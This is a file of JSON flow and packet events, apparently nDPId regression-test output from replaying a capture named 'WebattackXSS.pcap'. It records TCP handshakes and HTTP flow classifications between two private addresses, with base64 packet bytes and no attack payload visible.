+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":367,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347589555,"flow_last_seen":1499347594779,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58812,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":368,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347592060,"flow_last_seen":1499347597780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58838,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":369,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347593330,"flow_last_seen":1499347598782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58852,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6286,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":370,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347594595,"flow_last_seen":1499347599780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347720100,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58866,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347721376,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347721376,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6289,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":1,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UaNAAD4GdC2sEAABwKgKMutKAFCqmpZXAAAAAKACchBpRwAAAgQFtAQCCAoBO8f0AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6290,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":2,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347721376,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ60r+f8PRqpqWWKAScSAKhgAAAgQFtAQCCAoD5ZlpATvH9AEDAwc="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6291,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_packet_id":3,"flow_last_seen":1499347721376,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347721376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UaRAAD4GdDSsEAABwKgKMutKAFCqmpZY\/n\/D0oAQAOWpjQAAAQEICgE7x\/QD5Zlp"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347724082,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347724082,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6311,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":1,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Pn9AAD4Gh1GsEAABwKgKMutkAFAGCvTmAAAAAKACchCsiQAAAgQFtAQCCAoBO8qZAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6312,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":2,"flow_last_seen":1499347724082,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347724082,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ62S3KtySBgr056AScSB5twAAAgQFtAQCCAoD5ZwOATvKmQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6313,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_packet_id":3,"flow_last_seen":1499347724083,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347724083,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PoBAAD4Gh1isEAABwKgKMutkAFAGCvTntyrck4AQAOUYvwAAAQEICgE7ypkD5ZwO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347725355,"flow_last_seen":1499347725355,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347725355,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6320,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":1,"flow_last_seen":1499347725355,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725355,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jaBAAD4GODCsEAABwKgKMutyAFBT4UZ3AAAAAKACchAL1gAAAgQFtAQCCAoBO8vXAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6321,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":2,"flow_last_seen":1499347725356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347725356,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ63J14+58U+FGeKAScSAHIwAAAgQFtAQCCAoD5Z1MATvL1wEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6322,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":447,"flow_packet_id":3,"flow_last_seen":1499347725356,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347725356,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jaFAAD4GODesEAABwKgKMutyAFBT4UZ4dePufYAQAOWmKgAAAQEICgE7y9cD5Z1M"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347726623,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347726623,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60288,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6333,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":1,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8cctAAD4GVAWsEAABwKgKMuuAAFD+ZrzfAAAAAKACchDpnAAAAgQFtAQCCAoBO80UAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6334,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":2,"flow_last_seen":1499347726623,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347726623,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ64DDQROl\/ma84KAScSBxJgAAAgQFtAQCCAoD5Z6JATvNFAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6335,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":448,"flow_packet_id":3,"flow_last_seen":1499347726624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347726624,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ccxAAD4GVAysEAABwKgKMuuAAFD+Zrzgw0ETpoAQAOUQLgAAAQEICgE7zRQD5Z6J"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347729211,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347729211,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6351,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":1,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NhFAAD4Gj7+sEAABwKgKMuuaAFCuIPmKAAAAAKACchD6lgAAAgQFtAQCCAoBO8+bAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6352,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":2,"flow_last_seen":1499347729211,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347729211,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ65plKrngriD5i6AScSA3dQAAAgQFtAQCCAoD5aEQATvPmwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6354,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":449,"flow_packet_id":3,"flow_last_seen":1499347729212,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347729212,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NhJAAD4Gj8asEAABwKgKMuuaAFCuIPmLZSq54YAQAOXWfAAAAQEICgE7z5sD5aEQ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347730501,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730501,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6363,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83upAAD4G5uWsEAABwKgKMuuoAFBoeQ40AAAAAKACchAqRAAAAgQFtAQCCAoBO9DeAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6364,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":2,"flow_last_seen":1499347730501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347730501,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ66jFwizsaHkONaAScSCSPAAAAgQFtAQCCAoD5aJSATvQ3gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6365,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":3,"flow_last_seen":1499347730502,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347730502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03utAAD4G5uysEAABwKgKMuuoAFBoeQ41xcIs7YAQAOUxRAAAAQEICgE70N4D5aJS"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":374,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347602223,"flow_last_seen":1499347607783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58946,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":375,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347603507,"flow_last_seen":1499347608786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":376,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347604752,"flow_last_seen":1499347609784,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58974,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":371,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347597121,"flow_last_seen":1499347602781,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58892,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":372,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347598383,"flow_last_seen":1499347603782,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58906,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6372,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":373,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347599663,"flow_last_seen":1499347604783,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347730818,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58920,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 